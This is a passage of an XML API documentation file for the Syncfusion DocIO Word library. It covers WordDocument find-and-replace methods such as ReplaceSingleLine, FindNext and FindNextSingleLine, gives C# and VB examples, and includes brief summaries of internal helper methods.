            <param name="replacement">The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> specifies the text to replace.</param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="wholeWord">Set to <b>true</b> to match the whole word of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace the text extended to several paragraphs with another text.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Find the first occurrence of a particular text in the document
                TextSelection selection = document.Find("contents", false, false);
                //Replace the text extended to two paragraphs with text selection
                document.ReplaceSingleLine("First paragraph Second paragraph", selection, true, false);
                //Save and close the document
                document.Save("Replace.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Find the first occurrence of a particular text in the document
                Dim selection As TextSelection = document.Find("contents", False, False)
                'Replace the text extended to two paragraphs with text selection
                document.ReplaceSingleLine("First paragraph Second paragraph", selection, True, False)
                'Save and close the document
                document.Save("Replace.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.ReplaceSingleLine(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.TextSelection)">
            <summary>
            Replaces all entries of given regular expression text which is extended to several paragraph in the document with the 
            <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/>.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="replacement">The text selection to replace.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace the text extended to several paragraphs with another text.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Find the first occurrence of a particular text in the document
                TextSelection selection = document.Find("contents", false, false);
                //Replace the text extended to two paragraphs with text selection
                document.ReplaceSingleLine(new Regex("First paragraph Second paragraph"), selection);
                //Save and close the document
                document.Save("Replace.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Find the first occurrence of a particular text in the document
                Dim selection As TextSelection = document.Find("contents", False, False)
                'Replace the text extended to two paragraphs with text selection
                document.ReplaceSingleLine(New Regex("First paragraph Second paragraph"), selection)
                'Save and close the document
                document.Save("Replace.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.ReplaceSingleLine(System.String,Syncfusion.DocIO.DLS.TextBodyPart,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string which is extended to several paragraphs in the document with <see cref="T:Syncfusion.DocIO.DLS.TextBodyPart"/>, taking into
            consideration case sensitive, whole word options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="replacement">The text body part to replace.</param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="wholeWord">if it specifies whole word, set to <c>true</c>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace the text extended to several paragraphs with <see cref="T:Syncfusion.DocIO.DLS.TextBodyPart"/>.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Find the first occurrence of a particular text in the document
                TextSelection selection = document.Find("contents", false, false);
                //Initialize text body part
                TextBodyPart bodyPart = new TextBodyPart(selection);
                //Replace a particular text with the text body part
                document.ReplaceSingleLine("First paragraph Second paragraph", bodyPart, true, false);
                //Save and close the document
                document.Save("Replace.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Find the first occurrence of a particular text in the document
                Dim selection As TextSelection = document.Find("contents", False, False)
                'Initialize text body part
                Dim bodyPart As New TextBodyPart(selection)
                'Replace a particular text with the text body part
                document.ReplaceSingleLine("First paragraph Second paragraph", bodyPart, True, False)
                'Save and close the document
                document.Save("Replace.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.ReplaceSingleLine(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.TextBodyPart)">
            <summary>
            Replaces all entries of given regular expression text which is extended to several paragraph in the document with the 
            <see cref="T:Syncfusion.DocIO.DLS.TextBodyPart"/>.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="replacement">The text body part to replace.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace the text extended to several paragraphs with <see cref="T:Syncfusion.DocIO.DLS.TextBodyPart"/>.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Find the first occurrence of a particular text in the document
                TextSelection selection = document.Find("contents", false, false);
                //Initialize text body part
                TextBodyPart bodyPart = new TextBodyPart(selection);
                //Replace a particular text with the text body part
                document.ReplaceSingleLine(new Regex("First paragraph Second paragraph"), bodyPart);
                //Save and close the document
                document.Save("Replace.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Find the first occurrence of a particular text in the document
                Dim selection As TextSelection = document.Find("contents", False, False)
                'Initialize text body part
                Dim bodyPart As New TextBodyPart(selection)
                'Replace a particular text with the text body part
                document.ReplaceSingleLine(New Regex("First paragraph Second paragraph"), bodyPart)
                'Save and close the document
                document.Save("Replace.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.ReplaceHFSingleLine(System.Text.RegularExpressions.Regex,System.String)">
            <summary>
            Replaces the HF single line.
            </summary>
            <param name="pattern">The pattern.</param>
            <param name="replace">The replace.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.ResetSingleLineReplace">
            <summary>
            Resets the single line replace.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.ReplaceSingleLine(System.Text.RegularExpressions.Regex,System.String,Syncfusion.DocIO.DLS.TextBodyItem)">
            <summary>
            Replaces the single line.
            </summary>
            <param name="pattern">The pattern.</param>
            <param name="replace">The replace.</param>
            <param name="startItem">The start item.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.IsFloatingItemsContainSameZIndexValue">
            <summary>
            Check whether any of floating items contain same Z Order or not.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SortByZIndex(System.Boolean)">
            <summary>
            Sort the document floating items based on its Z-Index by ascending order
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SetZOrderPosition">
            <summary>
            Assign the new ZIndex values for all floating items in the document
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.FindNext(Syncfusion.DocIO.DLS.TextBodyItem,System.String,System.Boolean,System.Boolean)">
            <summary>
            Finds the next entry of the specified text from the specified text body item, taking into the consideration of caseSensitive
            and wholeWord options.
            </summary>
            <param name="startTextBodyItem">The <see cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/> that represents the start body item at which search starts (paragraph or table).</param>
            <param name="given">
            A string used to find the text.
            </param>
            <param name="caseSensitive">
            Set to <b>true</b> to match the similar case text which specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.
            </param>
            <param name="wholeWord">
            Set to <b>true</b> to match the whole word text which specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.
            </param>
            <returns>
            The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> that contains the found text in the document.
            </returns>
            <example>
            <para>The following code example demonstrates how to find a particular text and its next occurrence in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Find the first occurrence of a particular text in the document
                TextSelection textSelection = document.Find("as graphical contents", false, true);
                //Get the found text as single text range
                WTextRange textRange = textSelection.GetAsOneRange();
                //Modify the text
                textRange.Text = "Replaced text";
                //Set highlight color
                textRange.CharacterFormat.HighlightColor = Color.Yellow;
                //Find the next occurrence of a particular text from the previous paragraph
                textSelection = document.FindNext(textRange.OwnerParagraph, "paragraph", true, false);
                //Get the found text as single text range
                WTextRange range = textSelection.GetAsOneRange();
                //Set bold formatting
                range.CharacterFormat.Bold = true;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Find the first occurrence of a particular text in the document
                Dim textSelection As TextSelection = document.Find("as graphical contents", false, true)
                'Get the found text as single text range
                Dim textRange As WTextRange = textSelection.GetAsOneRange()
                'Modify the text
                textRange.Text = "Replaced text"
                'Set highlight color
                textRange.CharacterFormat.HighlightColor = Color.Yellow
                'Find the next occurrence of a particular text from the previous paragraph
                textSelection = document.FindNext(textRange.OwnerParagraph, "paragraph", true, false)
                'Get the found text as single text range
                Dim range As WTextRange = textSelection.GetAsOneRange()
                'Set bold formatting
                range.CharacterFormat.Bold = True
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextSelection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.FindNext(Syncfusion.DocIO.DLS.TextBodyItem,System.Text.RegularExpressions.Regex)">
            <summary>
            Finds the next entry of the specified regular expression from the specified text body item.
            </summary>
            <param name="startBodyItem">The <see cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/> that represents the start body item at which search starts (paragraph or table).</param>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> that contains the found text in the document.</returns>
            <example>
            <para>The following code example demonstrates how to find a particular text and its next occurrence in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Find the first occurrence of a particular text in the document
                TextSelection textSelection = document.Find("as graphical contents");
                //Get the found text as single text range
                WTextRange textRange = textSelection.GetAsOneRange();
                //Modify the text
                textRange.Text = "Replaced text";
                //Set highlight color
                textRange.CharacterFormat.HighlightColor = Color.Yellow;
                //Find the next occurrence of a particular text from the previous paragraph
                textSelection = document.FindNext(textRange.OwnerParagraph, "paragraph");
                //Get the found text as single text range
                WTextRange range = textSelection.GetAsOneRange();
                //Set bold formatting
                range.CharacterFormat.Bold = true;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Find the first occurrence of a particular text in the document
                Dim textSelection As TextSelection = document.Find("as graphical contents")
                'Get the found text as single text range
                Dim textRange As WTextRange = textSelection.GetAsOneRange()
                'Modify the text
                textRange.Text = "Replaced text"
                'Set highlight color
                textRange.CharacterFormat.HighlightColor = Color.Yellow
                'Find the next occurrence of a particular text from the previous paragraph
                textSelection = document.FindNext(textRange.OwnerParagraph, "paragraph")
                'Get the found text as single text range
                Dim range As WTextRange = textSelection.GetAsOneRange()
                'Set bold formatting
                range.CharacterFormat.Bold = True
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextSelection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.FindNext(System.Text.RegularExpressions.Regex)">
            <summary>
            Finds the next selection.
            </summary>
            <param name="pattern">The pattern.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.UpdateNextItem(Syncfusion.DocIO.DLS.TextSelection)">
            <summary>
            Updates the next item at which next find will start.
            </summary>
            <param name="selection">The selection.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.GetNextItem(Syncfusion.DocIO.DLS.TextBodyItem)">
            <summary>
            Gets the next paragraph item in textbody item.
            </summary>
            <param name="tbItem">The textbody item.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.GetNextItem(Syncfusion.DocIO.DLS.WTextBody)">
            <summary>
            Gets the next paragraph item in text body.
            </summary>
            <param name="textBody">The text body.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CheckSelection(Syncfusion.DocIO.DLS.TextSelection)">
            <summary>
            Checks the selection.
            </summary>
            <param name="textSel">The text selection.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.FindNextSingleLine(Syncfusion.DocIO.DLS.TextBodyItem,System.String,System.Boolean,System.Boolean)">
            <summary>
            Finds the next entry of the specified text from the specified text body item in single-line mode which is extended to several paragraph in the document, taking into the consideration of caseSensitive
            and wholeWord options.
            </summary>
            <param name="startTextBodyItem">The <see cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/> that represents the start body item at which search starts (paragraph or table).</param>
            <param name="given">
            A string used to find the text.
            </param>
            <param name="caseSensitive">
            Set to <b>true</b> to match the similar case text which specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.
            </param>
            <param name="wholeWord">
            Set to <b>true</b> to match the whole word text which specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.
            </param>
            <returns>
            The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> that contains the found text in the document.
            </returns>
            <example>
            <para>The following code example demonstrates how to find a particular text and its next occurrence which is extended to several paragraphs in the Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Find the first occurrence of a particular text extended to several paragraphs in the document
                TextSelection[] textSelections = document.FindSingleLine("First paragraph Second paragraph", true, false);
                WParagraph paragraph = null;
                foreach (TextSelection textSelection in textSelections)
                {
                    //Get the found text as single text range and set highlight color
                    WTextRange textRange = textSelection.GetAsOneRange();
                    textRange.CharacterFormat.HighlightColor = Color.YellowGreen;
                    paragraph = textRange.OwnerParagraph;
                }
                //Find the next occurrence of a particular text extended to several paragraphs in the document
                textSelections = document.FindNextSingleLine(paragraph, "First paragraph Second paragraph", true, false);
                foreach (TextSelection textSelection in textSelections)
                {
                    //Get the found text as single text range and set italic formatting
                    WTextRange text = textSelection.GetAsOneRange();
                    text.CharacterFormat.Italic = true;
                }
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Find the first occurrence of a particular text extended to several paragraphs in the document
                Dim textSelections As TextSelection() = document.FindSingleLine("First paragraph Second paragraph", True, False)
                Dim paragraph As WParagraph = Nothing
                  For Each textSelection As TextSelection In textSelections
                      'Get the found text as single text range and set highlight color
                      Dim textRange As WTextRange = textSelection.GetAsOneRange()
                      textRange.CharacterFormat.HighlightColor = Color.YellowGreen
                      paragraph = textRange.OwnerParagraph
                  Next
                'Find the next occurrence of a particular text extended to several paragraphs in the document
                textSelections = document.FindNextSingleLine(paragraph, "First paragraph Second paragraph", True, False)
                For Each textSelection As TextSelection In textSelections
                    'Get the found text as single text range and set italic formatting
                    Dim text As WTextRange = textSelection.GetAsOneRange()
                    text.CharacterFormat.Italic = True
                Next
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextSelection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.FindNextSingleLine(Syncfusion.DocIO.DLS.TextBodyItem,System.Text.RegularExpressions.Regex)">
            <summary>
            Finds the next entry of the specified pattern of text in single-line mode which is extended to several paragraph in the document.
            </summary>
            <param name="startBodyItem">The <see cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/> that represents the start body item at which search starts (paragraph or table).</param>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> that contains the found text in the document.</returns>
            <example>
            <para>The following code example demonstrates how to find a particular text and its next occurrence which is extended to several paragraphs in the Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Find the first occurrence of a particular text extended to several paragraphs in the document
                TextSelection[] textSelections = document.FindSingleLine("First paragraph Second paragraph", true, false);
                WParagraph paragraph = null;
                foreach (TextSelection textSelection in textSelections)
                {
                    //Get the found text as single text range and set highlight color
                    WTextRange textRange = textSelection.GetAsOneRange();
                    textRange.CharacterFormat.HighlightColor = Color.YellowGreen;
                    paragraph = textRange.OwnerParagraph;
                }
                //Find the next occurrence of a particular text extended to several paragraphs in the document
                textSelections = document.FindNextSingleLine(paragraph, new Regex("First paragraph Second paragraph"));
                foreach (TextSelection textSelection in textSelections)
                {
                    //Get the found text as single text range and set italic formatting
                    WTextRange text = textSelection.GetAsOneRange();
                    text.CharacterFormat.Italic = true;
                }
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Find the first occurrence of a particular text extended to several paragraphs in the document
                Dim textSelections As TextSelection() = document.FindSingleLine("First paragraph Second paragraph", True, False)
                Dim paragraph As WParagraph = Nothing
                  For Each textSelection As TextSelection In textSelections
                      'Get the found text as single text range and set highlight color
                      Dim textRange As WTextRange = textSelection.GetAsOneRange()
                      textRange.CharacterFormat.HighlightColor = Color.YellowGreen
                      paragraph = textRange.OwnerParagraph
                  Next
                'Find the next occurrence of a particular text extended to several paragraphs in the document
                textSelections = document.FindNextSingleLine(paragraph, new Regex("First paragraph Second paragraph"))
                For Each textSelection As TextSelection In textSelections
                    'Get the found text as single text range and set italic formatting
                    Dim text As WTextRange = textSelection.GetAsOneRange()
                    text.CharacterFormat.Italic = True
                Next
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextSelection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.FindNextSingleLine(System.Text.RegularExpressions.Regex)">
            <summary>
            Finds the next text which fit the specified pattern using single-line mode.
            </summary>
            <param name="pattern">The pattern.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.ResetFindNext">
            <summary>
            Resets the <see cref="!:WordDocument.FindNext()"/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CreateParagraphItem(Syncfusion.DocIO.DLS.ParagraphItemType)">
            <summary>
            Creates a new paragraph item instance.
            </summary>
            <param name="itemType">A <see cref="T:Syncfusion.DocIO.DLS.ParagraphItemType"/> represents the type of paragraph item to create.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.ParagraphItem"/> this method created.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CloneImpl">
            <summary>
            <exclude/>
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CreateCharacterFormatImpl">
            <summary>
            Implementation of character format creating
            </summary>
            <returns>Character format object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CreateListStyleImpl">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CreateListLevelImpl(Syncfusion.DocIO.DLS.ListStyle)">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CreateParagraphFormatImpl">
            <summary>
            Implementation of paragraph format creating
            </summary>
            <returns>Paragraph format object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CreateTableFormatImpl">
            <summary>
            Implementation of table format creating
            </summary>
            <returns>Table format instance</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CreateCellFormatImpl">
            <summary>
            Implementation of cell format creating
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CreateTextboxFormatImpl">
            <summary>
            Implementation of textbox format creating
            </summary>
            <returns>textbox format object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CreateTextBoxCollectionImpl">
            <summary>
            Text
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CreateListFormatImpl(Syncfusion.DocIO.DLS.IWParagraph)">
            <summary>
            
            </summary>
            <param name="owner"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CreateCompoundFile">
            <summary>
            Creates the compound file.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CreateCompoundFile(System.IO.Stream)">
            <summary>
            Creates the compound file.
            </summary>
            <param name="stream">The stream.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CheckForEncryption(System.IO.Stream)">
            <summary>
            Checks for encryption.
            </summary>
            <param name="stream">The stream.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.EnsureParagraphStyle(Syncfusion.DocIO.DLS.IWParagraph)">
            <summary>
            Ensures the paragraph style.
            </summary>
            <param name="paragraph">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CloneShapeEscher(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.IParagraphItem)">
            <summary>
            Clones the shape escher.
            </summary>
            <param name="destDoc">The destination doc.</param>
            <param name="shapeItem">The shape item.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CloneDocxProps(System.Collections.Generic.Dictionary{System.String,System.IO.Stream},System.Collections.Generic.Dictionary{System.String,System.IO.Stream})">
            <summary>
            Clones the DocxProps.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CloneStream(System.IO.Stream)">
            <summary>
            Clones the stream.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.GetPassword">
            <summary>
            Gets the password.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.InsertWatermark(Syncfusion.DocIO.DLS.WatermarkType)">
            <summary>
            Inserts the watermark.
            </summary>
            <param name="type">The type.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.ReadBackground">
            <summary>
            Reads document's background fill effects.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.ToDetailedDlsStream(System.IO.MemoryStream)">
            <summary>
            Saves the document to the detailed XML stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.HasListStyle">
            <summary>
            Determines whether list has style
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.InitDefaultParagraphFormat">
            <summary>
            Inits the default paragraph format.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Init">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CreateDefListStyles">
            <summary>
            Creates the default list styles.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CopyBinaryData(System.Byte[],System.Byte[]@)">
            <summary>
            Copies the binary data.
            </summary>
            <param name="srcData">The SRC data.</param>
            <param name="destData">The destination data.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.ClonePictureContainer(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            
            </summary>
            <param name="destDoc"></param>
            <param name="picture"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CloneTextBoxContainer(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.WTextBox)">
            <summary>
            Clones the textbox container.
            </summary>
            <param name="destDoc">The destination doc.</param>
            <param name="textBox">The textbox.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CloneAutoShapeContainer(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.ShapeObject)">
            <summary>
            Clones the auto shape container.
            </summary>
            <param name="destDoc">The destination doc.</param>
            <param name="shapeObj">The shape obj.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CheckContainer(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherShapeType,System.Int32)">
            <summary>
            Checks the container.
            </summary>
            <param name="type">The type.</param>
            <param name="spid">The spid.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.GetBackGndImage">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SetBackgroundImage(System.Drawing.Image)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.HasTrackedChanges">
            <summary>
            Determines whether document has tracked changes.
            </summary>
            <returns>
            	It has tracked changes, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.IsSecurityGranted">
            <summary>
            Checks whether security permission can be granted.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CheckExtension(System.String,Syncfusion.DocIO.FormatType)">
            <summary>
            Checks the extension with respect to formatType
            </summary>
            <param name="fileName">The filename</param>
            <param name="formatType">The FormatType</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CheckFileName(System.String)">
            <summary>
            Checks the name of the file.
            </summary>
            <param name="fileName">Name of the file.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CheckEvalExpired">
            <summary>
            Checks whether the evaluation expired.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.ResetWatermark">
            <summary>
            Resets the watermark.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.UpdateWriteWatermark">
            <summary>
            update the write watermark.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SetProtection(Syncfusion.DocIO.ProtectionType)">
            <summary>
            Sets the protection.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.WriteXml(System.Xml.XmlWriter)">
            <summary>
            Create default liststyles and add them to ListStyleCollection 
            </summary>
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.ReadXml(System.Xml.XmlReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.System#Xml#Serialization#IXmlSerializable#GetSchema">
            <summary>
            Gets xml schema
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.System#Xml#Serialization#IXmlSerializable#ReadXml(System.Xml.XmlReader)">
            <summary>
            Reads document using XmlReader
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.System#Xml#Serialization#IXmlSerializable#WriteXml(System.Xml.XmlWriter)">
            <summary>
            Writes document using XmlWriter
            </summary>
            <param name="writer"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.GetSchema">
            <summary>
            <exclude/>
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.WriteXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentWriter)">
            <summary>
            Writes object data as inside xml element.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentWriter"/> object.</param>
        </member>
